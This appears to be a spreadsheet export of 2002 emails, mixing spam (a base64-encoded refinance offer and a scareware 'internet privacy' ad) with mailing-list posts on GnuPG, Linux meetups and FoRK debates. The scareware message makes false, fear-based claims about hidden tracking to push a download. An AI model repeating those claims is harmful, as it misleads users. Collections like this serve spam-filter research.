 &amp;nbsp;&lt;a target="_blank" title="FirstStop WebSearch(TM) Deluxe Edition, a FREE trial version of this incredibly fast, award winning, customizable multi-search engine that has been described as the FASTEST no-nonsense meta search for the net. Now, Gnomies can save 50% when they register a copy of FirstStop WebSearch!" href="http://www.Firststopwebsearch.com/lockergnomeoffer.html"&gt;FirstStop WebSearch&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Ecobuilder is the ultimate web application that allows you to get your portal, online community, intranet, extranet or any web site project online by saving time, money and manpower. Gnomies receive $400 off the cost of the software." href="http://www.ecobuilder.com/lockergnome.cfm"&gt;Ecobuilder&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Software for organizing your personal book collection. Add books quickly - no typing required! Group, filter, sort and print your database. Click for free trial version." href="http://www.collectorz.com/book?from=lockergnome"&gt;Book Collector&lt;/a&gt;&lt;br&gt;
 &lt;p align="center"&gt;&lt;a href="http://www.lockergnome.com/special.html"&gt;&lt;B&gt;Get Listed Here&lt;/B&gt;&lt;/a&gt;&lt;/p&gt;
 Question: which group is 250,000+ strong and always looking for stuff to make their personal and professional lives run smoother? 
 &lt;!--#include virtual="/include/subscribeside.txt" --&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table align="center" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/furocamcam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font style="font-size: 7pt" size="1" face="Verdana, Tahoma, Arial"&gt;CLICK HERE TO ZOOM&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/font&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;LOOK IT UP&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;form method="post" action="http://www.lockergnome.com/cgi-bin/htsearch"&gt;&lt;input type="hidden" name="method" value="and"&gt;&lt;input type="hidden" name="format" value="long"&gt;&lt;input type="hidden" name="sort" value="score"&gt;&lt;input type="hidden" name="config" value="htdig"&gt;&lt;input type="hidden" name="restrict" value=""&gt;&lt;input type="hidden" name="exclude" value=""&gt;&lt;input type="text" size="14" value=" Lockergnome" name="words"&gt;&lt;input type="submit" class="Press" value="go"&gt;&lt;/form&gt;
 &lt;FORM method="get" action="http://www.amazon.com/exec/obidos/external-search"&gt;&lt;INPUT type="text" name="keyword" size="14" value=" Amazon"&gt;&lt;INPUT type="hidden" name="mode" value="blended"&gt;&lt;INPUT type="hidden" name="tag" value="lockergnomedigit"&gt;&lt;INPUT TYPE="submit" VALUE="go" class="Press" NAME="Go"&gt;&lt;/form&gt;
 &lt;form action="http://www.gnomejob.com/" method="POST"&gt;&lt;input type="hidden" name="num_per_page" value="20"&gt;&lt;input type="hidden" name="num_to_retrieve" value="500"&gt;&lt;input type="hidden" name="iquery" value=""&gt;&lt;input type="hidden" name="vlink_color" value="008080"&gt;&lt;input type="hidden" name="link_color" value="990000"&gt;&lt;input type="hidden" name="background_color" value="FFFFFF"&gt;&lt;input type="hidden" name="text_color" value="000000"&gt;&lt;input type="hidden" name="title_image" value="http://www.lockergnome.com/images/lgtopper.gif"&gt;&lt;input type="hidden" name="site_url" value="http://www.lockergnome.com/"&gt;&lt;input type="hidden" name="site_title" value="Lockergnome"&gt;&lt;input type="hidden" name="title_text" value="Lockergnome"&gt;&lt;input type="hidden" name="custom" value="1"&gt;&lt;input value=" Jobs" type="TEXT" name="query" size="14"&gt;&lt;input class="Press" type="SUBMIT" value="go"&gt;&lt;/form&gt;
 &lt;FORM method="get" action="http://lockergnome.pricegrabber.com/search_gen_top.php" target="_parent"&gt;&lt;input type="hidden" name="topcat_search" value="1"&gt;&lt;input value=" Hardware" size="14" type=text name=form_keyword&gt;&lt;INPUT type="SUBMIT" value="go" class="Press" NAME="Go"&gt;&lt;/FORM&gt;
 &lt;FORM method="get" action="http://lockergnome.pricegrabber.com/search_gen_top.php" target="_parent"&gt;&lt;input type="hidden" name="topcat_search" value="1"&gt;&lt;input value=" Software" size="14" type=text name=form_keyword&gt;&lt;INPUT type="SUBMIT" value="go" class="Press" NAME="Go"&gt;&lt;/FORM&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;BYTE ME NOW&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &amp;copy;2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our &lt;a href="http://www.lockergnome.com/terms.html"&gt;Terms of Service&lt;/a&gt;. Our Web site is hosted by &lt;a href="http://www.digitaldaze.com/?lg"&gt;DigitalDaze&lt;/a&gt;. Domain registered at &lt;a href="http://www.dnscentral.com/?lg"&gt;DNS Central&lt;/a&gt;.
 &lt;!-- FUNNY COMMENT    --&gt;
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Let Us Search For You-Refinance Now 2386BJsE0-561WVnn9l17
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B7_88D77D7B.C7065A48
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxib2R5Pg0KDQo8dGFibGUgd2lkdGg9IjcxNSI+DQogIDx0
 cj4NCiAgICA8dGQgdkFsaWduPSJ0b3AiIGFsaWduPSJsZWZ0IiB3aWR0aD0i
 NTExIj4NCiAgICAgIDxibG9ja3F1b3RlPg0KICAgICAgICA8Zm9udCBjb2xv
 cj0ibmF2eSIgc2l6ZT0iNCI+PGZvbnQgZmFjZT0iYXJpYWwiIGNvbG9yPSJy
 ZWQiIHNpemU9IjMiPjxiPjxpPiZxdW90O05vdw0KICAgICAgICBpcyB0aGUg
 dGltZSB0byB0YWtlIGFkdmFudGFnZSBvZiBmYWxsaW5nIGludGVyZXN0IHJh
 dGVzISBUaGVyZSBpcyBubw0KICAgICAgICBhZHZhbnRhZ2UgaW4gd2FpdGlu
 ZyBhbnkgbG9uZ2VyLiZxdW90OzwvaT48L2I+PGJyPg0KICAgICAgICA8YnI+
 DQogICAgICAgIDwvZm9udD48Zm9udCBzaXplPSIzIj5SZWZpbmFuY2Ugb3Ig
 Y29uc29saWRhdGUgaGlnaCBpbnRlcmVzdCBjcmVkaXQgY2FyZA0KICAgICAg
 ICBkZWJ0IGludG8gYSBsb3cgaW50ZXJlc3QgbW9ydGdhZ2UuIE1vcnRnYWdl
 IGludGVyZXN0IGlzIHRheCBkZWR1Y3RpYmxlLA0KICAgICAgICB3aGVyZWFz
 IGNyZWRpdCBjYXJkIGludGVyZXN0IGlzIG5vdC48YnI+DQogICAgICAgIDxi
 cj4NCiAgICAgICAgWW91IGNhbiBzYXZlIHRob3VzYW5kcyBvZiBkb2xsYXJz
 IG92ZXIgdGhlIGNvdXJzZSBvZiB5b3VyIGxvYW4gd2l0aCBqdXN0DQogICAg
 ICAgIGEgMC4yNSUgZHJvcCBpbiB5b3VyIHJhdGUhPGJyPg0KICAgICAgICA8
 YnI+DQogICAgICAgIE91ciBuYXRpb253aWRlIG5ldHdvcmsgb2YgbGVuZGVy
 cyBoYXZlIGh1bmRyZWRzIG9mIGRpZmZlcmVudCBsb2FuDQogICAgICAgIHBy
 b2dyYW1zIHRvIGZpdCB5b3VyIGN1cnJlbnQgc2l0dWF0aW9uOg0KICAgICAg
 ICA8YmxvY2txdW90ZT4NCiAgICAgICAgICA8Zm9udCBjb2xvcj0icmVkIj48
 Yj4NCiAgICAgICAgICA8dWw+DQogICAgICAgICAgICA8bGk+UmVmaW5hbmNl
 DQogICAgICAgICAgICA8bGk+U2Vjb25kIE1vcnRnYWdlDQogICAgICAgICAg
 ICA8bGk+RGVidCBDb25zb2xpZGF0aW9uDQogICAgICAgICAgICA8bGk+SG9t
 ZSBJbXByb3ZlbWVudA0KICAgICAgICAgICAgPGxpPlB1cmNoYXNlPC9saT4N
 CiAgICAgICAgICA8L3VsPg0KICAgICAgICAgIDwvYj4NCiAgICAgICAgICA8
 L2Jsb2NrcXVvdGU+DQogICAgICAgIDwvZm9udD4NCiAgICAgICAgPHAgYWxp
 Z249ImNlbnRlciI+PGZvbnQgc2l6ZT0iNCI+TGV0DQogICAgICAgIHVzIGRv
 IHRoZSBzaG9wcGluZyBmb3IgeW91Li4uPGEgaHJlZj0iaHR0cDovLzgxLjku
 OC4yOS9jZ2ktYmluL2Jlc3RfcmF0ZV92aXJ0dWFsLmNnaT9jb2RlPWNibW8x
 Ij5JVCBJUyBGUkVFITxicj4NCiAgICAgICAgQ0xJQ0sgSEVSRSZxdW90Ozwv
 YT48L2ZvbnQ+PC9wPg0KICAgICAgICA8YnI+DQogICAgICAgIDxiPlBsZWFz
 ZTxhIGhyZWY9Imh0dHA6Ly84MS45LjguMjkvY2dpLWJpbi9iZXN0X3JhdGVf
 dmlydHVhbC5jZ2k/Y29kZT1jYm1vMSI+DQogICAgICAgIENMSUNLIEhFUkUg
 PC9hPiB0byBmaWxsIG91dCBhIHF1aWNrIGZvcm0uIFlvdXIgcmVxdWVzdCB3
 aWxsIGJlDQogICAgICAgIHRyYW5zbWl0dGVkIHRvIG91ciBuZXR3b3JrIG9m
 IG1vcnRnYWdlIHNwZWNpYWxpc3RzIHdobyB3aWxsIHJlc3BvbmQgd2l0aA0K
 ICAgICAgICB1cCB0byB0aHJlZSBpbmRlcGVuZGVudCBvZmZlcnMuPC9iPjxi
 cj4NCiAgICAgICAgPGJyPg0KICAgICAgICA8Yj5UaGlzIHNlcnZpY2UgaXMg
 MTAwJSBmcmVlIHRvIGhvbWUgb3duZXJzIGFuZCBuZXcgaG9tZSBidXllcnMg
 d2l0aG91dA0KICAgICAgICBhbnkgb2JsaWdhdGlvbi48L2I+PC9mb250Pjwv
 Zm9udD4NCiAgICAgICAgPHA+PGZvbnQgc2l6ZT0iMyIgY29sb3I9Im5hdnki
 PjxiPjxhIGhyZWY9Im1haWx0bzpzdGFybHlAYnRhbWFpbC5uZXQuY24iPkNs
 aWNrDQogICAgICAgIGhlcmUgdG8gYmUgdGFrZW4gb3V0IG9mIHRoaXMgZGF0
 YWJhc2UuPC9hPjwvYj48L2ZvbnQ+PC9wPg0KICAgICAgPC9ibG9ja3F1b3Rl
 Pg0KICAgIDwvdGQ+DQogICAgPHRkIHZBbGlnbj0idG9wIiBhbGlnbj0icmln
 aHQiIHdpZHRoPSIxOTAiPjxicj4NCiAgICAgIDxicj4NCiAgICAgIDxiYXNl
 Zm9udCBzaXplPSIyIj4NCiAgICAgIDx0YWJsZSB3aWR0aD0iMTc1IiBiZ0Nv
 bG9yPSIjZWVlZWVlIj4NCiAgICAgICAgPHRib2R5Pg0KICAgICAgICAgIDx0
 cj4NCiAgICAgICAgICAgIDx0ZCBhbGlnbj0ibWlkZGxlIiBjb2xTcGFuPSIy
 Ij5OYXRpb25hbCBBdmVyYWdlczwvdGQ+DQogICAgICAgICAgPC90cj4NCiAg
 ICAgICAgICA8dHI+DQogICAgICAgICAgICA8dGQgd2lkdGg9IjkxIj48dT5Q
 cm9ncmFtPC91PjwvdGQ+DQogICAgICAgICAgICA8dGQ+PHU+UmF0ZTwvdT48
 L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAgICAgICAgPHRyPg0KICAgICAg
 ICAgICAgPHRkIHdpZHRoPSI5MSI+MzBZZWFyIEZpeGVkPC90ZD4NCiAgICAg
 ICAgICAgIDx0ZCB3aWR0aD0iNDIiPjYuMzc1JTwvdGQ+DQogICAgICAgICAg
 PC90cj4NCiAgICAgICAgICA8dHI+DQogICAgICAgICAgICA8dGQgd2lkdGg9
 IjkxIj4xNVllYXIgRml4ZWQ8L3RkPg0KICAgICAgICAgICAgPHRkIHdpZHRo
 PSI0MiI+NS43NTAlPC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICAg
 IDx0cj4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iOTEiPjVZZWFyIEJhbGxv
 b248L3RkPg0KICAgICAgICAgICAgPHRkIHdpZHRoPSI0MiI+NS4yNTAlPC90
 ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICAgIDx0cj4NCiAgICAgICAg
 ICAgIDx0ZCB3aWR0aD0iOTEiPjEvMUFybTwvdGQ+DQogICAgICAgICAgICA8
 dGQgd2lkdGg9IjQyIj40LjI1MCU8L3RkPg0KICAgICAgICAgIDwvdHI+DQog
 ICAgICAgICAgPHRyPg0KICAgICAgICAgICAgPHRkIHdpZHRoPSI5MSI+NS8x
 QXJtPC90ZD4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDIiPjUuNjI1JTwv
 dGQ+DQogICAgICAgICAgPC90cj4NCiAgICAgICAgICA8dHI+DQogICAgICAg
 ICAgICA8dGQgd2lkdGg9IjkxIj48Zm9udCBzaXplPSItMiI+RkhBMzAgWWVh
 ciBGaXhlZDwvZm9udD48L3RkPg0KICAgICAgICAgICAgPHRkIHdpZHRoPSI0
 MiI+Ni41MDAlPC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICAgIDx0
 cj4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iOTEiPlZBIDMwIFllYXIgRml4
 ZWQ8L3RkPg0KICAgICAgICAgICAgPHRkIHdpZHRoPSI0MiI+Ni41MDAlPC90
 ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICA8L3Rib2R5Pg0KICAgICAg
 PC90YWJsZT4NCiAgICAgIDxicj4NCiAgICAgIDxmb250IHNpemU9IjIiPg0K
 ICAgICAgPHAgYWxpZ249InJpZ2h0Ij4mcXVvdDs8aT5Zb3UgZGlkIGFsbCB0
 aGUgc2hvcHBpbmcgZm9yIG1lLiBUaGFuayB5b3UhPC9pPjxicj4NCiAgICAg
 IDxiPi08Zm9udCBzaXplPSIxIj5UPC9mb250PjwvZm9udD48Zm9udCBzaXpl
 PSIxIj4uPGZvbnQgc2l6ZT0iMiI+IE4uIENhcC48L2ZvbnQ+PC9mb250Pjxm
 b250IHNpemU9IjIiPg0KICAgICAgPGZvbnQgc2l6ZT0iMSI+Q0E8L2ZvbnQ+
 PC9mb250PjwvYj4NCiAgICAgIDxwIGFsaWduPSJyaWdodCI+JnF1b3Q7PGk+
 Li5Zb3UgaGVscGVkIG1lIGZpbmFuY2UgYSBuZXcgaG9tZSBhbmQgSSBnb3Qg
 YQ0KICAgICAgdmVyeSBnb29kIGRlYWwuPC9pPjxicj4NCiAgICAgIDxiPi08
 Zm9udCBzaXplPSIxIj4gUi4gSC4gSC4gQ0E8L2ZvbnQ+PC9iPjxicj4NCiAg
 ICAgIDxwIGFsaWduPSJyaWdodCI+JnF1b3Q7PGk+Li5pdCB3YXMgZWFzeSwg
 YW5kIHF1aWNrLi4uITwvaT48YnI+DQogICAgICA8Yj4tPGZvbnQgc2l6ZT0i
 MSI+Vi4gUy4gTi4gUC4gV0E8L2ZvbnQ+PC9iPjxicj4NCiAgICAgIDxicj4N
 CiAgICAgIDwvcD4NCiAgICAgIDwvdGQ+DQogICAgPC90YWJsZT4NCg0KICA8
 L2JvZHk+DQoNCjwvaHRtbD4NCjxmb250IGNvbG9yPSJXaGl0ZSI+DQpTdXJw
 cmlzZSBQYXJ0eTg0MTZ5TVZ2MC0zOThmcW1yNTU3N3hZTFI2LTA5N3hMSHAw
 MDQ3V0FMeDgtODQ4bDQ0DQoNCjMxMzRkS0pjNS0xMDJqalNlNzIzN0h5SUk0
 LTUyOWtnWVY4NjgxSkdITjAtNTQwSm5OWjA0ODB5TGRQMy1sNTcNCg==
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Hi,
 &gt; 
 &gt; On Sun, 01 Sep 2002 00:05:03 MDT Reg Clemens wrote: 
 &gt;   
 &gt; [...]
 &gt; &gt; in messages with GnuPG signatures.  But punching the line ALWAYS
 &gt; &gt; gives
 &gt; &gt; 
 &gt; &gt;         Signature made Thu Aug 29 00:27:17 2002 MDT using DSA key ID BDDF997A
 &gt; &gt;         Can't check signature: public key not found
 &gt; &gt; 
 &gt; &gt; So, something else is missing.
 &gt; 
 &gt; Yes, the public key of the signature you want to check :-).
 &gt; 
 &gt; Are you really sure that you have the public key of the message's
 &gt; signature? If not, try downloading it or try to check a signature from
 &gt; which you know you have the public key.
 &gt; 
 &gt; 
 &gt; 
 Ah, sorry for not making that clearer.
 But no.
 Previously (v1.0.6 of GnuPG) there would be a slight pause at this point while
 it went out to get the public key from a keyserver.
 Now, whether I have the key or NOT, I get the failure message.
 Its as if it cant find gpg to execute it (but I fixed that path), so there
 must be something else that I am missing...
 -- 
                                         Reg.Clemens
                                         reg@dwf.com
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Well boyz, whats the story? Its tuesday an all. I've to work late today so
 what time are we talking about? 
 CW
 -------------------
 On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:
 &gt; When are we going to have a pint? 
  Tuesday next week. Boars Head, Capel st.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">If it's unwritten, how'm I supposed to know unless someone CALLS me up and 
 tells me/  hint hint.  LOL  (:  Well, I reckon it's a written rule now, 
 since it's on the internet in text format w/ your name attached, but then 
 again, when have I ever followed any damned rules???  (:
 C
 On Sat, 7 Sep 2002, Geege Schuman wrote:
 &gt; unwritten rule.  8-)
 &gt; 
 &gt; gg
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 &gt; Sent: Friday, September 06, 2002 10:21 PM
 &gt; To: Geege Schuman
 &gt; Cc: bitbitch@magnesium.net; Adam L. Beberg; fork@spamassassin.taint.org
 &gt; Subject: RE: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 &gt; 
 &gt; 
 &gt; Why should I?  (:
 &gt; C
 &gt; 
 &gt; On Fri, 6 Sep 2002, Geege Schuman wrote:
 &gt; 
 &gt; &gt; quitcherbraggin.
 &gt; &gt;
 &gt; &gt; :-)
 &gt; &gt; gg
 &gt; &gt;
 &gt; &gt; -----Original Message-----
 &gt; &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 &gt; &gt; Sent: Friday, September 06, 2002 3:42 AM
 &gt; &gt; To: bitbitch@magnesium.net
 &gt; &gt; Cc: Adam L. Beberg; fork@spamassassin.taint.org
 &gt; &gt; Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; I dunno, BB.  Women who like to be thought of this way should have the
 &gt; &gt; right to choose to be treated this way.  Men too...  ahem.  (:  My boy
 &gt; &gt; cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
 &gt; &gt; of hours I do, sometimes more, if he has to catch up with me.  (:  I
 &gt; &gt; close him because he is industrious and creative, and because he
 &gt; &gt; unfailingly makes my bed the minute I get out of it.  And boy #2 will be
 &gt; &gt; here soon to help boy #1 with other things such as pedicures,  backrubs,
 &gt; &gt; and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
 &gt; &gt; have his cake and eat it too, if he can only find the right girl who has
 &gt; &gt; the same beliefs about gender  roles that he has. Of course, he has NO
 &gt; &gt; clue where to look, so we will be constantly laughing at him while he
 &gt; &gt; stumbles around in the dark.
 &gt; &gt; Cindy
 &gt; &gt; P.S. the numbers do not in any way indicate importance or favor -- only
 &gt; &gt; the order in which they move into my house.  -smiles at chris-
 &gt; &gt; P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
 &gt; &gt; driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
 &gt; &gt; like it normally does.  Wish me luck.  I'm going to look for another
 &gt; &gt; computer job.  Le Sigh.  (:
 &gt; &gt;
 &gt; &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; &gt;
 &gt; &gt; &gt; Hello Adam,
 &gt; &gt; &gt;
 &gt; &gt; &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt; &gt; &gt;
 &gt; &gt; &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; &gt; &gt; so often...  (anyone else want to do the honors?)
 &gt; &gt; &gt;
 &gt; &gt; &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
 &gt; &gt; then
 &gt; &gt; &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
 &gt; &gt; she and
 &gt; &gt; &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; &gt; &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded"
 &gt; choices?
 &gt; &gt; &gt;
 &gt; &gt; &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; &gt; &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; &gt; &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; &gt; &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; &gt; &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; &gt; &gt; find -love- (which is the crucial distinction between this system) and
 &gt; &gt; &gt; they marry one another for the satisfaction of being together.   I
 &gt; &gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; &gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; &gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; &gt; &gt; motivator for marrying her, we would not be having this conversation
 &gt; &gt; &gt; now.
 &gt; &gt; &gt;
 &gt; &gt; &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; &gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; &gt; &gt; situations are great, provided everyone is aware that the relationship
 &gt; &gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; &gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; &gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; &gt; &gt; marriage.
 &gt; &gt; &gt;
 &gt; &gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; &gt; &gt; blame law school and my cat.
 &gt; &gt; &gt;
 &gt; &gt; &gt; -BB
 &gt; &gt; &gt;
 &gt; &gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; &gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; &gt; &gt; ALB&gt;   beberg@mithral.com
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt;
 &gt; &gt; --
 &gt; &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; 
 &gt; --
 &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I paid for CuteFTP on my Windows box.  Well worth the money despite there 
 being free alternatives, no regrets whatsoever.
 Now that Mozilla isn't taking X down twice a day I'm unlikely to pay for 
 Opera, but if that hadn't happened around the same time I made the switch 
 to 100% unix I would have been happy to.
 - Lucas
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: boycotting yahoo
</t>
  </si>
  <si>
    <t xml:space="preserve">Because of this:
 http://hrw.org/press/2002/08/yahoo080902.htm
 there are several of us who are in the BDSM lifestyle who are trying to 
 encourage our local groups to find alternatives to yahoo groups as a way 
 of communicating with each other.  I've set up a place to have maillists 
 on my server for any group who wants to use it, but I was wondering if 
 anyone knows of an alternative that allows all the bells and whistles that 
 yahoo has, such as reminders, file storage, calendars, etc.  Anyone?
 TIA,
 Cindy
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Clean up your act!
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Computer User 100670.3527 ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Arial" size="2"&gt;YOUR INTERNET USAGE IS BEING TRACKED&lt;br&gt;
 You have no privacy protection.&lt;br&gt;
 Will your BOSS, WIFE or KIDS find out?&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font face="Arial"&gt;
 &lt;a href="http://www185.fastwebsnet.com/"&gt;DOWNLOAD EZ INTERNET PRIVACY SOFTWARE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;
 &lt;br&gt;
 +++++++++++++++++++++++++++++++++++++++++++&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 You're in Serious Trouble - It's a Proven Fact!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Deleting &amp;quot;Internet Cache and History&amp;quot; will NOT protect you because any of&lt;br&gt;
 the Web Pages, Pictures, Movies, Videos, Sounds, E-mail, Chat Logs and&lt;br&gt;
 Everything Else you see or do could easily be recovered to Haunt you&lt;br&gt;
 forever! How would you feel if a snoop made this information public to your&lt;br&gt;
 Spouse, Mother &amp;amp; Father, Neighbors, Children, Boss or the Media? It could&lt;br&gt;
 easily Ruin Your Life! Solve all your problems and enjoy all the benefits of&lt;br&gt;
 an &amp;quot;As New PC&amp;quot;, EZ INTERNET PRIVACY SOFTWARE can Speed-Up your PC/Internet Browser,&lt;br&gt;
 reclaim Hard Disk space and Professionally Clean your PC in one easy mouse&lt;br&gt;
 click!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Did you know for example that every click you make on Windows 98 Start Menu&lt;br&gt;
 is logged and stored permanently on a hidden encrypted database within your&lt;br&gt;
 own computer?&lt;br&gt;
 Deleting &amp;quot;internet cache and history&amp;quot;, will not protect you... your PC is&lt;br&gt;
 keeping frightening records of both your online and off-line activity. Any&lt;br&gt;
 of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail and Everything&lt;br&gt;
 Else you or anyone else have ever viewed could easily be recovered - even&lt;br&gt;
 many years later!&lt;br&gt;
 How would you feel if somebody snooped this information out of your computer&lt;br&gt;
 and made it public?&lt;br&gt;
 Do your children or their friends use your computers? What have they&lt;br&gt;
 downloaded and tried to delete?&lt;br&gt;
 Act now! And stop these files coming &amp;quot;back from the dead&amp;quot; to haunt you!&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial" size="5"&gt;&lt;a href="http://www185.fastwebsnet.com/"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;to be removed &lt;a href="http://www185.fastwebsnet.com/takemeoff.html"&gt;Click Here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [IYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Baseline] Raising chickens the high-tech way
</t>
  </si>
  <si>
    <t xml:space="preserve">My take: if genetic engineering includes selective breeding, then it
 also includes human pairs that are not randomly grouped.
 It doesn't matter if those two intend what they are doing, they are
 engaged in a 'selected sort'.  It has been brought up that a boss no
 longer marries his secretary.  Now the female law partner selects
 another high earning mate (at least associate law).  So instead of two
 couples making $140K a piece (100K + 40K) you have one pair with $200
 and one pair with $80 and this has some interesting social effects.  And
 one of those effects is the difference in their children (on average).
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Karl
 &gt; Anderson
 &gt; Sent: Wednesday, July 24, 2002 1:15 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: [Baseline] Raising chickens the high-tech way
 &gt; 
 &gt; Elias Sinderson &lt;elias@cse.ucsc.edu&gt; writes:
 &gt; 
 &gt; &gt; Sorry, Karl, your confusing things.
 &gt; 
 &gt; No, it's just a silly discussion, but that's what picky semantic
 &gt; discussions turn into :)
 &gt; 
 &gt; &gt; Thos is saying that selective
 &gt; &gt; breeding should be counted as genetic engineering, whereas you are
 &gt; &gt; extending his definition to include the attration that your parents
 &gt; felt...
 &gt; 
